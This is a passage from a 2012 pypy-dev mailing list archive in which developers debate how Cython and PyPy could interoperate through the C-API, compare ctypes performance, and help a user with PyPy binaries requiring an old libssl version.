working on a project of fast packet sniffers and I'm comparing >>>> performance between different languages. >>>> So, we came up with a simple ARP sniffer that I ported to Python using >>>> ctypes. >>> >>> If performance is important to you, you may want to write the wrapper for >>> Python in Cython instead (and maybe also parts of the filtering code, which >>> I assume your program to be about). >> >> I appreciate your willingness to advertise cython wherever it's >> possible, but this is simply not on topic on the current thread. > > S?bastien Volle replied to my mail telling me that their current approach > was actually based on LuaJIT and its native FFI, and that he was mostly > comparing that to other languages (which all loose thoroughly in the > competition, BTW). That makes Cython on-topic for him at least. > > I also find Cython generally *very* on-topic when the intention is to > interface Python code with C code, especially when performance and/or ease > of use are part of the requirements. In terms of features and comfort, > ctypes is still a bit too far behind the user experience that Cython has to > offer. Given how important Cython has become for the Python ecosystem in > many regards, it's sad that PyPy still doesn't have it available. From what > I hear, that's a serious blocker to some users. (Or should I say "most users"?) Fair point actually. And I agree about all points about ctypes. > > >> Cython is not a panacea for all woes > > Well, what is? > > >> and it's actually slower than >> pypy on most cases that don't involve calling C. It's also slower even >> when you provide direct type annotations > > Ah, "most cases", hm? How is that for a well founded statement? What are > you using for comparison? speed.pypy.org? Have you noticed that amongst all > those benchmarks there that PyPy was specifically tuned for, there is not a > single benchmark that was selected specifically for Cython? There are > always lies, damn lies and then there are benchmarks, don't forget that. Well, those benchmarks were not really selected for pypy. There is a very limited set of available interesting python benchmarks and we made the selection rather on "what is slow" rather than "what is fast", if any sort of pypy-related things were considered, barring the obvious "does it run on PyPy". > > >> so you have a pretty >> reasonable usecase for pypy even in cases where calling C is a >> problem. Also, we're going to attack those ctypes problems. > > Since when is "we can do that, too" synonymous with "there are no > alternatives"? World domination seems an attractive goal to go after, but > it's pretty boring in the long run. > > Besides, "going to attack" admits that you're not there yet. Cython has > been there for a couple of years now, it solves real problems that real > users have today, and it's constantly getting better in doing so, because > it's being designed and developed to solve those problems. > > It may not be obvious to you, but PyPy isn't a panacea either. > Right. I agree that cython offers a much better experience than ctypes. > >> If you wish to respond to my mail, please put it into a post that has >> a different title and not hijack all the discussions with cython. > > Ok, done. BTW, what are those show-off mails meant for that you keep > sending to python-dev on each PyPy release? Do you really consider them > on-topic for the development of the CPython runtime, or even just the > Python language? Food for thought ... Hm. I dunno, that might be really a mistake on our side. I'll probably stick with python announce then. PS. Sorry for the tone of my original email, it was a bit unprofessional. Cheers, fijal From amauryfa at gmail.com Mon Feb 13 22:06:45 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Mon, 13 Feb 2012 22:06:45 +0100 Subject: [pypy-dev] offtopic, ontopic, ... (was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: 2012/2/13 Stefan Behnel > Given how important Cython has become for the Python ecosystem in > many regards, it's sad that PyPy still doesn't have it available > Last time I looked, Cython still generates code that PyPy cannot handle: for example, it explicitly messes with tstate->curexc_type &co, Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Mon Feb 13 22:54:00 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 13 Feb 2012 22:54:00 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: Message-ID: Maciej Fijalkowski, 13.02.2012 21:41: > On Mon, Feb 13, 2012 at 9:37 PM, Stefan Behnel wrote: >> What are >> you using for comparison? speed.pypy.org? Have you noticed that amongst all >> those benchmarks there that PyPy was specifically tuned for, there is not a >> single benchmark that was selected specifically for Cython? There are >> always lies, damn lies and then there are benchmarks, don't forget that. > > Well, those benchmarks were not really selected for pypy. There is a > very limited set of available interesting python benchmarks and we > made the selection rather on "what is slow" rather than "what is > fast", if any sort of pypy-related things were considered, barring the > obvious "does it run on PyPy". Mind my wording. The thing is that the PyPy devs used these benchmarks to tune PyPy, i.e. they became the exact set of software that PyPy is particularly fast for. That makes them less interesting benchmarks for others and reduces their value for comparison, unless a similar amount of continuous effort (years, I presume) is spent in other projects to tune their tools for the exact same set (or even just a subset) of this software. I'm not trying to suggest that the choice of benchmarks is bad in any way or that they are not representing real-world requirements, not at all. But PyPy has a special advantage in running exactly this benchmark suite. To make this clear (and I don't think this is just my personal point of view), it is not the intention of the Cython project to run the specific, unmodified (or even partly or fully statically typed) software in this benchmark suite anywhere near as fast as PyPy, simply because we are focussing on other ways of tuning and rewriting code than would be required for running these benchmarks the way they are. It's not only because we can't, it's because it would be a useless waste of programmer resources to even try. It's the kind of software that PyPy was (and is being) designed and tuned to run, and it saves us a lot of effort to just let it do that. > I agree that cython offers a much better experience than ctypes. Phew, I'm happy you say that. :) > PS. Sorry for the tone of my original email, it was a bit unprofessional. Same here. Happens to all of us. Thanks, Martijn, for hooking in just-in-time (which finally gets us back on topic for this list). Stefan From faassen at startifact.com Mon Feb 13 22:57:52 2012 From: faassen at startifact.com (Martijn Faassen) Date: Mon, 13 Feb 2012 22:57:52 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: Message-ID: Hey, Thanks guys for bringing the discussion back on track! Regards, Martijn From stefan_ml at behnel.de Mon Feb 13 23:26:53 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 13 Feb 2012 23:26:53 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 13.02.2012 22:06: > 2012/2/13 Stefan Behnel > >> Given how important Cython has become for the Python ecosystem in >> many regards, it's sad that PyPy still doesn't have it available > > Last time I looked, Cython still generates code that PyPy cannot handle: > for example, it explicitly messes with tstate->curexc_type &co, > Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? Just two general comments on this, because these internals are really off-topic for this list and much better suited for the cython-dev list. 1) These things are usually done for two reasons: sometimes for better performance (inlining!), but also because there are cases where CPython fails to match its own Python-level semantics at the C-API level (simply because no-one else but Cython actually needs them there). So we sometimes end up rewriting parts of its C-API in a way that allows us to reimplement the correct Python semantics on top of them. Also note that Python 2 and 3 behave severely different in some corners, but Cython must be able to support both behaviours regardless of which of the two C-APIs the C compiler finds at compile time. Exception handling is a particularly shining example, I can tell. 2) Given that PyPy has proper Python semantics built-in, it would be much better to reuse those and sort-of add Cython semantics to them in some way, than to try to interface with PyPy at the bare C-API level. However, note that Cython's type system is really complex. That's basically all the Cython language adds over Python: a bunch of types and a huge set of pretty smart rules to fit them together. That makes a true Cython-backend for PyPy a much more ambitious longer-term goal than a set of "quick and dirty but doesn't always work" kind of C-API hacks to improve the connection between the two. Personally, I think both are worth exploring. Stefan From dhubler at u.washington.edu Mon Feb 13 23:42:16 2012 From: dhubler at u.washington.edu (Dale Hubler) Date: Mon, 13 Feb 2012 14:42:16 -0800 Subject: [pypy-dev] question re: ancient SSL requirement of pypy Message-ID: <4F3991C8.5040305@u.washington.edu> Hello, I was requested to install pypy but our computers appear to be too new to run it, having libssl.so.0.9.8e among other newer items. This confuses me because the web page for pypy shows a 2011 date and blog entries from 2012. Can 2005 SSL really be a requirement, I am unable to install such an old item on a cluster where this software might be used. I looked at the pypy site but cannot find any supported platforms, install guide, etc. I am trying this on RedHat EL 5. I tried the binary release, but it also had the same error, no libssl.so.0.9.8, which is true, my systems are updated. I must be missing something. Do you have any links or other on-line info explaining how to build pypy. thanks, Dale -- Dale Hubler dhubler at uw.edu (206) 685-4035 Senior Computer Specialist University of Washington Genome Sciences Dept. From anto.cuni at gmail.com Tue Feb 14 00:04:40 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 00:04:40 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: Message-ID: <4F399708.2070608@gmail.com> On 02/13/2012 11:26 PM, Stefan Behnel wrote: >> > Last time I looked, Cython still generates code that PyPy cannot handle: >> > for example, it explicitly messes with tstate->curexc_type&co, >> > Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? > Just two general comments on this, because these internals are really > off-topic for this list and much better suited for the cython-dev list. > > 1) These things are usually done for two reasons: sometimes for better > performance (inlining!), but also because there are cases where CPython > fails to match its own Python-level semantics at the C-API level (simply > because no-one else but Cython actually needs them there). So we sometimes > end up rewriting parts of its C-API in a way that allows us to reimplement > the correct Python semantics on top of them. what about wrapping these "cython hacks" into some macros (which would be defined only when compiling against CPython)? This way, they would still have the same semantic/performance when compiling for CPython, but that would still allow PyPy to implement them. Basically, I'm proposing to unoficially extend a bit the C API so that PyPy and Cython can meet. I agree that in the long run this is probably not the best solution, however it might be interesting in the short run. ciao, anto From anto.cuni at gmail.com Tue Feb 14 00:12:47 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 00:12:47 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: <4F390C5E.4060802@gmail.com> Message-ID: <4F3998EF.1020407@gmail.com> On 02/13/2012 03:22 PM, S?bastien Volle wrote: > Thank you for your help Antonio. It seems a little indentation problem in the > modified arp.py file you attached makes the main() loop to return after a > single packet. I attached the updated version. ops, I should have taken more care: actually, I was a bit surprised to see such a huge improvement, but didn't check more. This is what happens when you don't have tests to run ;-) > The actual new figures are: > CPython: ~580ms (~310ms with initial version) > PyPy: ~1120ms (~1300ms with initial version) > > So, the manual cast of array to c_void_p makes the program around 2x slower on > CPython, and only marginally faster on PyPy. PyPy spends now most its time in > pointer.py:_cast_addr(). uhm, indeed, then my suggestion doesn't work very well. I suppose that I should just add support for arrays to the fast path. ciao, Anto From markflorisson88 at gmail.com Tue Feb 14 00:59:05 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Mon, 13 Feb 2012 23:59:05 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F399708.2070608@gmail.com> References: <4F399708.2070608@gmail.com> Message-ID: On 13 February 2012 23:04, Antonio Cuni wrote: > On 02/13/2012 11:26 PM, Stefan Behnel wrote: >>> >>> > ?Last time I looked, Cython still generates code that PyPy cannot >>> > handle: >>> > ?for example, it explicitly messes with tstate->curexc_type&co, >>> > ?Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? >> >> Just two general comments on this, because these internals are really >> off-topic for this list and much better suited for the cython-dev list. >> >> 1) These things are usually done for two reasons: sometimes for better >> performance (inlining!), but also because there are cases where CPython >> fails to match its own Python-level semantics at the C-API level (simply >> because no-one else but Cython actually needs them there). So we sometimes >> end up rewriting parts of its C-API in a way that allows us to reimplement >> the correct Python semantics on top of them. > > > what about wrapping these "cython hacks" into some macros (which would be > defined only when compiling against CPython)? This way, they would still > have the same semantic/performance when compiling for CPython, but that > would still allow PyPy to implement them. > > Basically, I'm proposing to unoficially extend a bit the C API so that PyPy > and Cython can meet. I agree that in the long run this is probably not the > best solution, however it might be interesting in the short run. That would be neat, interfacing at the C level is much easier than at a Python + ctypes level in many ways for Cython. Forgive my ignorance, but is there a complete-ish overview of which parts of the CPython C API are available? Perhaps the generated C code can also appease the GC in some way instead of refcounting the objects? As a further point of interest, is there any support for the buffer interface (PEP 3118)? On a side note, me and Dag Sverre will be at PyCon this year to attend the main conference and to do some sprinting on Cython. Perhaps we could draw up a concrete proposal that could make pypy and Cython work together. > ciao, > anto > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From bokr at oz.net Tue Feb 14 04:02:11 2012 From: bokr at oz.net (Bengt Richter) Date: Mon, 13 Feb 2012 19:02:11 -0800 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> References: <4F3991C8.5040305@u.washington.edu> Message-ID: <4F39CEB3.8070607@oz.net> On 02/13/2012 02:42 PM Dale Hubler wrote: > Hello, > > I was requested to install pypy but our computers appear to be too new > to run it, having libssl.so.0.9.8e among other newer items. This > confuses me because the web page for pypy shows a 2011 date and blog > entries from 2012. Can 2005 SSL really be a requirement, I am unable > to install such an old item on a cluster where this software might be used. > > I looked at the pypy site but cannot find any supported platforms, > install guide, etc. I am trying this on RedHat EL 5. I tried the > binary release, but it also had the same error, no libssl.so.0.9.8, > which is true, my systems are updated. I must be missing something. > Do you have any links or other on-line info explaining how to build pypy. > > thanks, > Dale > FWIW, I've been wondering what this difference means re SSL: __________________________________________ [18:57 ~/wk/llac/bin]$ grep -i openssl <(strings $(which pypy)) OpenSSL_add_all_digests OPENSSL_0.9.8 OPENSSL_VERSION openssl_sha224 openssl_sha512 openssl_sha384 openssl_sha1] OPENSSL_VERSION_INFO] OPENSSL_VERSION_NUMBER openssl_sha256 openssl_md5 OpenSSL 0.9.8k 25 Mar 2009 Returns 1 if the OpenSSL PRNG has been seeded with enough data and 0 if not. Mix string into the OpenSSL PRNG state. entropy (a float) is a lower [18:58 ~/wk/llac/bin]$ grep -i openssl <(strings $(which python)) [18:58 ~/wk/llac/bin]$ __________________________________________ (i.e., openssl doesn't appear in python, but does in pypy. Linked differently?) Regards, Bengt Richter From mail at justinbogner.com Tue Feb 14 07:43:29 2012 From: mail at justinbogner.com (Justin Bogner) Date: Mon, 13 Feb 2012 23:43:29 -0700 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> (Dale Hubler's message of "Mon, 13 Feb 2012 14:42:16 -0800") References: <4F3991C8.5040305@u.washington.edu> Message-ID: <87sjidkj8u.fsf@glimpse.justinbogner.com> Dale Hubler writes: > I looked at the pypy site but cannot find any supported platforms, > install guide, etc. I am trying this on RedHat EL 5. I tried the > binary release, but it also had the same error, no libssl.so.0.9.8, > which is true, my systems are updated. I must be missing something. > Do you have any links or other on-line info explaining how to build > pypy. I think it's just the pre-built binaries that have that dependency. ldd shows that the pypy I translated myself links against libssl.so.1.0.0. It is possible to translate pypy with cpython, though it takes something like twice as long as translating with a pre-built pypy. Instructions for translating here: http://doc.pypy.org/en/latest/getting-started-python.html From stefan_ml at behnel.de Tue Feb 14 08:46:56 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 08:46:56 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F399708.2070608@gmail.com> References: <4F399708.2070608@gmail.com> Message-ID: Antonio Cuni, 14.02.2012 00:04: > On 02/13/2012 11:26 PM, Stefan Behnel wrote: >>> > Last time I looked, Cython still generates code that PyPy cannot handle: >>> > for example, it explicitly messes with tstate->curexc_type&co, >>> > Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? >> Just two general comments on this, because these internals are really >> off-topic for this list and much better suited for the cython-dev list. >> >> 1) These things are usually done for two reasons: sometimes for better >> performance (inlining!), but also because there are cases where CPython >> fails to match its own Python-level semantics at the C-API level (simply >> because no-one else but Cython actually needs them there). So we sometimes >> end up rewriting parts of its C-API in a way that allows us to reimplement >> the correct Python semantics on top of them. > > what about wrapping these "cython hacks" into some macros (which would be > defined only when compiling against CPython)? These things (and I would not commonly use the word 'hacks' for them) "never" happen in generated code (and if they do, that should be easy to fix). They only exist in helper functions that we write out into the C module code, sometimes with template replacements, but most of the time just as they were written. It wouldn't be hard at all to generate completely different helper code for a PyPy target, be it by explicitly selecting a different implementation at code generation time, or by making their inner workings depend on a C preprocessor flag (which we tend to do anyway in order to accommodate for C-API changes in CPython). In fact, we might even start telling our utility code management component about alternative implementations, and have it select the right one on the way out, depending on the code target. That would keep the changes to the actual compiler code at a bare minimum, while giving us a huge level of flexibility in the implementation. > This way, they would still > have the same semantic/performance when compiling for CPython, but that > would still allow PyPy to implement them. > > Basically, I'm proposing to unoficially extend a bit the C API so that PyPy > and Cython can meet. I agree that in the long run this is probably not the > best solution, however it might be interesting in the short run. I agree that this would be at least a good thing to start with. I have no idea how to do things like buffer code interfacing or GIL handling yet, but if any PyPy developers attend PyCon-US this year, Dag and Mark will be the perfect people to talk to about that. Stefan From stefan_ml at behnel.de Tue Feb 14 09:17:09 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 09:17:09 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> Message-ID: Stefan Behnel, 14.02.2012 08:46: > Antonio Cuni, 14.02.2012 00:04: >> On 02/13/2012 11:26 PM, Stefan Behnel wrote: >>>>> Last time I looked, Cython still generates code that PyPy cannot handle: >>>>> for example, it explicitly messes with tstate->curexc_type&co, >>>>> Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? >>> Just two general comments on this, because these internals are really >>> off-topic for this list and much better suited for the cython-dev list. >>> >>> 1) These things are usually done for two reasons: sometimes for better >>> performance (inlining!), but also because there are cases where CPython >>> fails to match its own Python-level semantics at the C-API level (simply >>> because no-one else but Cython actually needs them there). So we sometimes >>> end up rewriting parts of its C-API in a way that allows us to reimplement >>> the correct Python semantics on top of them. >> >> what about wrapping these "cython hacks" into some macros (which would be >> defined only when compiling against CPython)? > > These things (and I would not commonly use the word 'hacks' for them) > "never" happen in generated code (and if they do, that should be easy to > fix). They only exist in helper functions that we write out into the C > module code, sometimes with template replacements, but most of the time > just as they were written. It wouldn't be hard at all to generate > completely different helper code for a PyPy target, be it by explicitly > selecting a different implementation at code generation time, or by making > their inner workings depend on a C preprocessor flag (which we tend to do > anyway in order to accommodate for C-API changes in CPython). > > In fact, we might even start telling our utility code management component > about alternative implementations, and have it select the right one on the > way out, depending on the code target. That would keep the changes to the > actual compiler code at a bare minimum, while giving us a huge level of > flexibility in the implementation. Thinking about this some more - as long as we can get away with what the C preprocessor gives us, it will make it easier for developers to ship the generated C sources. It has always been Cython's philosophy that Cython code should be compiled down to C once and then build on as many platforms as possible without modifications. Stuffing the code for both CPython and PyPy into the same C source file may result in a noticeable increase in C code size at some point, but as long as the C preprocessor can filter it back out, at least the build times won't go up all that much, and it's not like a couple of compressed KBytes more would hurt a PyPI package these days. Stefan From anto.cuni at gmail.com Tue Feb 14 09:35:36 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 09:35:36 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> Message-ID: <4F3A1CD8.4040606@gmail.com> On 02/14/2012 09:17 AM, Stefan Behnel wrote: > > Stuffing the code for both CPython and PyPy into the same C source file may > result in a noticeable increase in C code size at some point, but as long > as the C preprocessor can filter it back out, at least the build times > won't go up all that much, and it's not like a couple of compressed KBytes > more would hurt a PyPI package these days. This is unlikley to happen IMHO, because PyPy does not offer its own C API (yet?). The only C API supported by PyPy is cpyext, which is a (slowish) wrapper compatible with CPython. The only places where the C code needs to be different is where Cython bypass the C API and directly manipulates the underlying C structures. ciao, Anto From stefan_ml at behnel.de Tue Feb 14 10:30:37 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 10:30:37 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3A1CD8.4040606@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> Message-ID: Antonio Cuni, 14.02.2012 09:35: > On 02/14/2012 09:17 AM, Stefan Behnel wrote: >> >> Stuffing the code for both CPython and PyPy into the same C source file may >> result in a noticeable increase in C code size at some point, but as long >> as the C preprocessor can filter it back out, at least the build times >> won't go up all that much, and it's not like a couple of compressed KBytes >> more would hurt a PyPI package these days. > > This is unlikley to happen IMHO, because PyPy does not offer its own C API > (yet?). The only C API supported by PyPy is cpyext, which is a (slowish) > wrapper compatible with CPython. > > The only places where the C code needs to be different is where Cython > bypass the C API and directly manipulates the underlying C structures. I agree that this interconnection should grow out of cpyext, but I think we should look out for ways to extend (pun intended) that C-API in order to improve both the efficiency and the semantics. I mean, even Py_INCREF() is wrapped in another macro in Cython that we already replace by code that does ref-counting validation for us at test time. Feel free to let us generate any code you want for that, including special setup and cleanup code at a function boundary or other appropriate places. Higher level functionality could be wrapped in PyPy-specific C-API calls to avoid going through multiple CPython API calls, e.g. a method lookup followed by a call. We could emit hints like "the code is only going to use this object temporarily for iteration", which may allow PyPy to reduce the overhead of providing a C fa?ade for it. Maybe there are mechanisms on PyPy side that Cython could hook into in order to create and use objects more efficiently, or it could drop optimistic optimisations that are known to never apply to PyPy and only cost runtime checks or degrade the performance in other ways. Seriously - we control the code on both sides. I think the possibilities are endless. Stefan From amauryfa at gmail.com Tue Feb 14 10:41:10 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 14 Feb 2012 10:41:10 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> Message-ID: 2012/2/14 Stefan Behnel > Antonio Cuni, 14.02.2012 09:35: > > On 02/14/2012 09:17 AM, Stefan Behnel wrote: > >> > >> Stuffing the code for both CPython and PyPy into the same C source file > may > >> result in a noticeable increase in C code size at some point, but as > long > >> as the C preprocessor can filter it back out, at least the build times > >> won't go up all that much, and it's not like a couple of compressed > KBytes > >> more would hurt a PyPI package these days. > > > > This is unlikley to happen IMHO, because PyPy does not offer its own C > API > > (yet?). The only C API supported by PyPy is cpyext, which is a (slowish) > > wrapper compatible with CPython. > > > > The only places where the C code needs to be different is where Cython > > bypass the C API and directly manipulates the underlying C structures. > > I agree that this interconnection should grow out of cpyext, but I think we > should look out for ways to extend (pun intended) that C-API in order to > improve both the efficiency and the semantics. > > I mean, even Py_INCREF() is wrapped in another macro in Cython that we > already replace by code that does ref-counting validation for us at test > time. Feel free to let us generate any code you want for that, including > special setup and cleanup code at a function boundary or other appropriate > places. > > Higher level functionality could be wrapped in PyPy-specific C-API calls to > avoid going through multiple CPython API calls, e.g. a method lookup > followed by a call. > > We could emit hints like "the code is only going to use this object > temporarily for iteration", which may allow PyPy to reduce the overhead of > providing a C fa?ade for it. Maybe there are mechanisms on PyPy side that > Cython could hook into in order to create and use objects more efficiently, > or it could drop optimistic optimisations that are known to never apply to > PyPy and only cost runtime checks or degrade the performance in other ways. > > Seriously - we control the code on both sides. I think the possibilities > are endless. Why only think in terms of C code then? The best API pypy offers so far is written in RPython - space operations, type definitions, and external C calls. The "only" missing part is to allow this in a separately compiled module. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Tue Feb 14 10:45:32 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 11:45:32 +0200 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> References: <4F3991C8.5040305@u.washington.edu> Message-ID: On Tue, Feb 14, 2012 at 12:42 AM, Dale Hubler wrote: > Hello, > > I was requested to install pypy but our computers appear to be too new to > run it, having libssl.so.0.9.8e among other newer items. ? This confuses me > because the web page for pypy shows a 2011 date and blog entries from 2012. > ? Can 2005 SSL really be a requirement, I am unable to install such an old > item on a cluster where this software might be used. > > I looked at the pypy site but cannot find any supported platforms, install > guide, etc. ? I am trying this on RedHat EL 5. ? I tried the binary release, > but it also had the same error, no libssl.so.0.9.8, which is true, my > systems are updated. ?I must be missing something. ? Do you have any links > or other on-line info explaining how to build pypy. > thanks, > Dale > > -- > Dale Hubler ? ?dhubler at uw.edu (206) 685-4035 > Senior Computer Specialist University of Washington Genome Sciences Dept. > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev It's not PyPy requirement, it's the binary requirement. To be honest, binary distribution on linux is a major mess. Fortunately for most popular distributions there is a better or worse source of official or semi-official way to get it directly from the distribution and that;'s a recommended way (fedora, ubuntu, debian, gentoo and arch package pypy). From anto.cuni at gmail.com Tue Feb 14 10:48:10 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 10:48:10 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> Message-ID: <4F3A2DDA.107@gmail.com> On 02/14/2012 10:41 AM, Amaury Forgeot d'Arc wrote: > > Seriously - we control the code on both sides. I think the possibilities > are endless. > > > Why only think in terms of C code then? The best API pypy offers so far > is written in RPython - space operations, type definitions, and external C calls. > > The "only" missing part is to allow this in a separately compiled module. yes, I agree with amaury. My proposal was just "a dirty hack" to make things working in the short term. In the long run, I think that the best for pypy would be either an rpython backend or the python+ctypes backend which Romain began. Or, possibly, a python+_ffi backend in case ctypes is too slow (and once _ffi is powerful enough to substitute ctypes entirely). ciao, Anto From fijall at gmail.com Tue Feb 14 10:50:57 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 11:50:57 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3A2DDA.107@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 11:48 AM, Antonio Cuni wrote: > On 02/14/2012 10:41 AM, Amaury Forgeot d'Arc wrote: >> >> >> ? ?Seriously - we control the code on both sides. I think the >> possibilities >> ? ?are endless. >> >> >> Why only think in terms of C code then? The best API pypy offers so far >> is written in RPython - space operations, type definitions, and external C >> calls. >> >> The "only" missing part is to allow this in a separately compiled module. > > > yes, I agree with amaury. My proposal was just "a dirty hack" to make things > working in the short term. > > In the long run, I think that the best for pypy would be either an rpython > backend or the python+ctypes backend which Romain began. Or, possibly, a > python+_ffi backend in case ctypes is too slow (and once _ffi is powerful > enough to substitute ctypes entirely). > > ciao, > Anto The thing is noone seriously works on the cython's pypy backend, so the dirty hacks seem like a very good solution short-to-mid term. From arigo at tunes.org Tue Feb 14 13:13:24 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 13:13:24 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Hi Fijal, On Tue, Feb 14, 2012 at 10:50, Maciej Fijalkowski wrote: > The thing is noone seriously works on the cython's pypy backend, so > the dirty hacks seem like a very good solution short-to-mid term. Someone feel free to try them out. However I'm generally negative about the outcome and its portability. Please do keep in mind however that generating C code and having custom macros to compile it either for CPython or for PyPy is *not* going to work --- unless someone very carefully designs some very clever missing piece and we place a number of restrictions about the cases where it works. Stefan: the main problem is that the RPython-to-C translation that we do is not just a one-format traduction. We need to tweak the intermediate code in various ways depending on various settings. The way it is tweaked really depends on these settings in a way that cannot be captured just by C macros. (If it could, we might have written the whole project in C instead of RPython in the first place.) You would end up with a version of the Cython C code that only works on *some* kind of PyPy, like using the minimark GC, without any JIT support, and without sandboxing support. (Just to add an example, I could also say "and without stackless support", but this is no longer true nowadays because we no longer rely on a transformation for stackless.) For this reason, I remain convinced that the best approach for Cython on PyPy is instead to have Cython generate pure Python code that would use some API in the form of a built-in Python module. ctypes may work, but custom alternatives may be better. The built-in module can be implemented just once on PyPy (and optionally on CPython too, mostly for testing). A bient?t, Armin. From arigo at tunes.org Tue Feb 14 13:18:27 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 13:18:27 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Re-Hi, On Tue, Feb 14, 2012 at 13:13, Armin Rigo wrote: > For this reason, I remain convinced that the best approach for Cython > on PyPy is instead to have Cython generate pure Python code that would > use some API in the form of a built-in Python module. For what it's worth, it would work if the Cython sources (or even the C intermediate sources) were "compiled" into any custom bytecode, not necessarily Python's. We would then write a simple interpreter for it in RPython, which looks kind of easy. It may seem strange, but it's actually similar to regular expressions. As a rather extreme solution: I wonder how useful it would be to use gcc to cross-compile the C intermediate sources to MIPS assembler, and write a MIPS interpreter in RPython... (MIPS because it's apparently a very simple instruction set) A bient?t, Armin. From anto.cuni at gmail.com Tue Feb 14 13:23:24 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 13:23:24 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <4F3A523C.6040600@gmail.com> On 02/14/2012 01:18 PM, Armin Rigo wrote: > As a rather extreme solution: I wonder how useful it would be to use > gcc to cross-compile the C intermediate sources to MIPS assembler, and > write a MIPS interpreter in RPython... (MIPS because it's apparently > a very simple instruction set) this approach would work for all C extensions then, not just Cython's one, right? From amauryfa at gmail.com Tue Feb 14 13:26:14 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 14 Feb 2012 13:26:14 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: 2012/2/14 Armin Rigo > As a rather extreme solution: I wonder how useful it would be to use > gcc to cross-compile the C intermediate sources to MIPS assembler, and > write a MIPS interpreter in RPython... (MIPS because it's apparently > a very simple instruction set) > Are you suggesting something similar to emscripten? A LLVM-to-RPython compiler! :-) -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Tue Feb 14 13:40:17 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 13:40:17 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Armin Rigo, 14.02.2012 13:18: > On Tue, Feb 14, 2012 at 13:13, Armin Rigo wrote: >> For this reason, 